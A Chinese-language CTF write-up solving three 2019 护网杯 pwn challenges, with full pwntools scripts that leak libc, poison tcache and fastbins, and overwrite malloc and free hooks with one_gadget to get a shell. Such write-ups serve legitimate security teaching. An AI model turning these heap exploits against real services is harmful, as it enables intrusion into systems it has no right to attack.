题目地址:https://github.com/hacker-mao/ctf_repo/tree/master/%E6%8A%A4%E7%BD%91%E6%9D%AF2019/pwn
一共4道题,比赛时间太短,赛后花了一天时间弄出3道,继续
mergeheap
- libc2.27,典型的tcache题目,程序的漏洞在于off by one
当分配的堆块占用了下一chunk的pre_size位时,strcpy的时候会将下一chunk的size也复制,再配合strcat会溢出一个字节
首先先填满tcache,为了下一次free时候将会放入unsorted bin中,然后构造4个不和填充tcache的chunk大小一样的chunk,注意chunk1和chunk2的大小要等于chunk0,为了等下构造堆溢出
#填满tcache
for i in range(7):
add(0x80,str(i))
for i in range(7):
dele(i)
add(0x78,'a') #0
add(0x38,'b'*0x38) #1
add(0x40,'d'*0x3f+'\x91') #2
add(0x60,'c') #3
- 接着释放chunk0,合并chunk1和chunk2到chunk0的位置,并且会触发off by one修改chunk1的size为0x91
dele(0)
merge(1,2) #0
- 然后把chunk1 free掉会得到一块0x90的bins,但由于0x90的tcache事先被填充满了,所以会放入unsorted bin中,然后我们再分配一块0x30大小的chunk,libc会从刚刚的unsorted bin中切割一部分,这时候剩下的unsorted bin刚好落入chunk2上,打印chunk2就可以泄漏libc,进而得到free_hook地址和one_gadget地址
dele(1)
add(0x30,'d') #1
show(2)
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak_libc : 0x%x',leak_libc)
libc_base = leak_libc - 96 - 0x3ebc40
info('libc_base : 0x%x',libc_base)
free_hook = libc_base + 0x3ed8e8
one_gadget = libc_base + 0x4f322
- 紧接着重复类似上面的操作
#清空unsorted bin
add(0x40,'1')
add(0x68,'aa') #5
add(0x28,'b'*0x38) #6
add(0x40,'d'*0x3f+'\x81') #7
add(0x60,'c') #8
- 依然利用off by one修改chunk_size
dele(5)
merge(6,7) #5
- free 掉chunk6,再free掉chunk7,再malloc一个0x70的chunk就会分配到chunk6的位置,这时候就可以对chunk7进行uaf利用,修改fd指针指向free_hook,然后改为one_gadget
#hijack free_hook -> one_gadget
dele(6)
dele(7)
add(0x70,'a'*0x20+p64(0)+p64(0x51)+p64(free_hook))
add(0x40,'b')
add(0x40,p64(one_gadget))
dele(0)
完整exp:
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./mergeheap')
#p = remote('49.232.101.96',51582)
def sl(x):
p.sendline(x)
def ru(x):
p.recvuntil(x)
def se(x):
p.send(x)
def add(size,content):
ru('>>')
sl('1')
ru('len:')
sl(str(size))
ru('content:')
sl(content)
def show(idx):
ru('>>')
sl('2')
ru('idx:')
sl(str(idx))
def dele(idx):
ru('>>')
sl('3')
ru('idx:')
sl(str(idx))
def merge(idx_1,idx_2):
ru('>>')
sl('4')
ru('idx1:')
sl(str(idx_1))
ru('idx2:')
sl(str(idx_2))
#填满tcache
for i in range(7):
add(0x80,str(i))
for i in range(7):
dele(i)
add(0x78,'a') #0
add(0x38,'b'*0x38) #1
add(0x40,'d'*0x3f+'\x91') #2
add(0x60,'c') #3
#----------------------------------
dele(0)
merge(1,2) #0
#----------------------------------
dele(1)
add(0x30,'d') #1
show(2)
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak_libc : 0x%x',leak_libc)
libc_base = leak_libc - 96 - 0x3ebc40
info('libc_base : 0x%x',libc_base)
free_hook = libc_base + 0x3ed8e8
one_gadget = libc_base + 0x4f322
#----------------------------------
#清空unsorted bin
add(0x40,'1')
add(0x68,'aa') #5
add(0x28,'b'*0x38) #6
add(0x40,'d'*0x3f+'\x81') #7
add(0x60,'c') #8
#----------------------------------
dele(5)
merge(6,7) #5
#----------------------------------
#hijack free_hook -> one_gadget
dele(6)
dele(7)
add(0x70,'a'*0x20+p64(0)+p64(0x51)+p64(free_hook))
add(0x40,'b')
add(0x40,p64(one_gadget))
#trigger one_gadget
dele(0)
#----------------------------------
#gdb.attach(p)
p.interactive()
silentheap
- 这题主要考验细心程度吧,漏洞点在dele里。第二次循环没有到9,因此假如输入idx为9,就会直接把ptr[9] free掉,然后把flag[9]置0
- 如果我们将ptr[9]分配一个0x360的堆块,原先的flag值是2,经过dele(9)后,它的值会变成0,这时候执行case3的函数时,将会调用(ptr[index]+0x554)这个地址的函数,而我们可以通过修改aThouWhoArtDark来构造一个地址,相当于任意地址执行,但我们不知道one_gadget地址,由于题目是32位的,发现one_gadget地址每次只会变动2个字节,于是可以爆破2字节去执行one_gadget地址,概率是1/256,试了下还挺快的
#开了alsr运行了几次的one_gadget地址
0xf75a6c69
0xf754dc69
0xf7570c69
0xf7583c69
exp:
#coding:utf-8
from pwn import *
context.log_level = 'debug'
def sl(x):
p.sendline(x)
def ru(x):
p.recvuntil(x)
def se(x):
p.send(x)
def new():
sl('1')
def new_1():
sl('2')
def zhixinghanshu(index,cont1,cont2):
sl('3')
sl(str(index))
sl(cont1)
sl(cont2)
def dele(index):
sl('4')
sl(str(index))
def edit(choice,cont):
sl('5')
sl(str(choice))
sl(cont)
def pwn_it():
for i in range(9):
new()
one_gadget = 0xf75a9c5c
#one_gadget = 0xf7e3fc5c
#fake chunk -> *(ptr[index]+0x55*4)
pay = 'a'*(0x54*4) + p32(one_gadget)
edit(2,pay)
new_1()
dele(9)
#gdb.attach(p)
zhixinghanshu(9,'1','2')
#0xf75a6c69
#0xf754dc69
#0xf7570c69
#0xf7583c69
p.sendline('ls')
p.sendline('ls')
data = p.recv()
if (data):
p.interactive()
if __name__ == '__main__':
while True:
try:
p = process('./silentheap')
pwn_it()
except Exception as e:
p.close()
finally:
p.close()
pwn2
这题与hctf2018的heapstorm zero十分像,所以参考了它的wp之后做出来了
这题漏洞点在于off by null,而且题目限制了chunk只能0x58大小,如果只是 fastbin 的话 off by null 是没法利用的,但是这里有个小tips,使用 scanf 获取内容时,如果 输入字符串比较长会调用 malloc 来分配内存。
在 malloc 分配内存时,首先会一次扫描一遍 fastbin , smallbin , unsorted bin ,largebin, 如果都找不到可以分配的 chunk 分配给用户 , 会进入 top_chunk 分配的流程, 如果此时还有fastbin ,就会触发堆合并机制,把 fastbin 合并 之后放入 smallbin,再看能否分配,不能的话会使用 top_chunk 进行分配。
于是利用 scanf 能分配大内存的特性,我们可以触发 堆合并,然后让 fastbin 合并成一个smallbin , 然后在触发 off-by-null , 就是常规的利用思路了。
- 先构造好堆的分布,以便后续利用,其中chunk1,chunk2,chunk3,chunk4的size之和要为0x110为了后续的off by null操作
add_flo(0x58,0,'a')
add_flo(0x30,1,'b')
add_flo(0x30,2,'c')
add_flo(0x40,3,'d')
add_flo(0x30,4,p64(8)*4+p64(0x100)+p64(0x10))
add_flo(0x30,5,'e')
remove_flo(5)
add_flo(0x10,5,'e') #保留块, 防止和 top chunk 合并
add_flo(0x30,5,'e')
- 然后释放chunk1-5,再利用scanf触发fastbin合并为small bin,所以现在得到了一块大小为0x110的small bin
for i in range(1,5):
remove_flo(i)
triger_consolidate()
- 释放chunk0,再分配chunk0,利用off by null修改chunk1的size为0x100
remove_flo(0)
add_flo(0x58,0,'a'*0x58)
- 通过对small bin的4次切割,再次分配4个chunk
add_flo(0x10,1,'a')
add_flo(0x30,2,'b')
add_flo(0x30,3,'\x78')
add_flo(0x50,4,'d')
- 然后我们释放chunk1,chunk2,并通过scanf让他们合并为small bin,再通过释放chunk5与scanf来触发unlink机制,通过 extend 前向 overlapping,得到一个包含chunk3和chunk4的大small bin,具体原理可以看http://blog.eonew.cn/archives/546#_free_smallbin_extend
remove_flo(1)
remove_flo(2)
triger_consolidate()
remove_flo(5)
triger_consolidate()
- 由于chunk3之前保留了small bin分配下来的指针,所以通过chunk3泄漏libc,从而得到其他地址
#leak libc
show_flo(3)
ru('flowers : ')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
libc_base = leak_libc - 88 - 0x3c4b20
info('libc base : 0x%x'%libc_base)
realloc_hook = libc_base + 0x3c4b10 - 0x28
main_arena = libc_base + 0x3c4b38 - 0x8
one_gadget = libc_base + 0xf02a4
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
realloc = libc_base + libc.symbols['__libc_realloc']
- 将chunk3,chunk4也释放,得到两个fastbin ,通过切割大small bin,使得到的堆块能够修改fastbin的fd指针
remove_flo(3)
remove_flo(4)
for i in range(2):
add_flo(0x10,1,'1111')
pay = p64(0)*3 + p64(0x41) + p64(0x61)
add_flo(0x40,2,pay)
pay = p64(0) + p64(0x61) + p64(main_arena)
add_flo(0x20,3,pay)
- malloc一个0x30的堆块会从fastbin中取出,此时fastbin只剩下0x61
add_flo(0x30,2,'2') #消除0x40 fastbin
- 于是我们可以分配堆块到main_arena中,然后去修改top_chunk到realloc_hook前面
add_flo(0x58,3,'3')
add_flo(0x58,3,p64(0)*7+p64(realloc_hook))
- 接着先分配堆块清除unsorted bin,然后分配堆块到realloc_hook,修改realloc_hook 为 one_gadget,malloc_hook为realloc函数+0x14地址处,通过malloc函数来触发one_gadget
for i in range(3):
add_flo(0x20,'1','1')
pay = p64(0)*2 + p64(one_gadget) + p64(realloc+0x14)
add_flo(0x40,3,pay)
ru('choice >> \n')
sl('1')
ru('of Size : ')
sl('10')
ru('index: ')
sl('0')
- 这里是因为直接改malloc_hook为one_gadget不满足条件,所以无法getshell,才通过malloc_hook调用realloc_hook的方法,通过通过改realloc函数偏移的方法微调来满足one_gadget的条件
完整exp
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./pwn 2')
def sl(x):
p.sendline(x)
def ru(x):
p.recvuntil(x)
def se(x):
p.send(x)
def add_flo(size,index,name):
ru('choice >> \n')
sl('1')
ru('of Size : ')
sl(str(size))
ru('index: ')
sl(str(index))
ru(' name:')
se(name)
def remove_flo(index):
ru('choice >> \n')
sl('2')
ru('input idx :')
sl(str(index))
def show_flo(index):
ru('choice >> \n')
sl('3')
ru('Input idx : \n')
sl(str(index))
def triger_consolidate():
ru('choice >> \n')
sl('1'*0x400)
add_flo(0x58,0,'a')
add_flo(0x30,1,'b')
add_flo(0x30,2,'c')
add_flo(0x40,3,'d')
add_flo(0x30,4,p64(0)*4+p64(0x100)+p64(0x10))
add_flo(0x30,5,'e')
remove_flo(5)
add_flo(0x10,5,'e') #保留块, 防止和 top chunk 合并
add_flo(0x30,5,'e')
#----------------------------
for i in range(1,5):
remove_flo(i)
triger_consolidate()
#----------------------------
remove_flo(0)
add_flo(0x58,0,'a'*0x58)
#----------------------------
add_flo(0x10,1,'a')
add_flo(0x30,2,'b')
add_flo(0x30,3,'\x78')
add_flo(0x50,4,'d')
#----------------------------
remove_flo(1)
remove_flo(2)
triger_consolidate()
remove_flo(5)
triger_consolidate()
#----------------------------
#leak libc
show_flo(3)
ru('flowers : ')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
libc_base = leak_libc - 88 - 0x3c4b20
info('libc base : 0x%x'%libc_base)
realloc_hook = libc_base + 0x3c4b10 - 0x28
main_arena = libc_base + 0x3c4b38 - 0x8
one_gadget = libc_base + 0xf02a4
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
realloc = libc_base + libc.symbols['__libc_realloc']
#----------------------------
remove_flo(3)
remove_flo(4)
for i in range(2):
add_flo(0x10,1,'1111')
pay = p64(0)*3 + p64(0x41) + p64(0x61)
add_flo(0x40,2,pay)
pay = p64(0) + p64(0x61) + p64(main_arena)
add_flo(0x20,3,pay)
#----------------------------
add_flo(0x30,2,'2') #消除0x40 fastbin
add_flo(0x58,3,'3')
add_flo(0x58,3,p64(0)*7+p64(realloc_hook))
#----------------------------
for i in range(3):
add_flo(0x20,'1','1')
pay = p64(0)*2 + p64(one_gadget) + p64(realloc+0x14)
add_flo(0x40,3,pay)
#----------------------------
#gdb.attach(p)
#trigger one_gadget
ru('choice >> \n')
sl('1')
ru('of Size : ')
sl('10')
ru('index: ')
sl('0')
p.interactive()
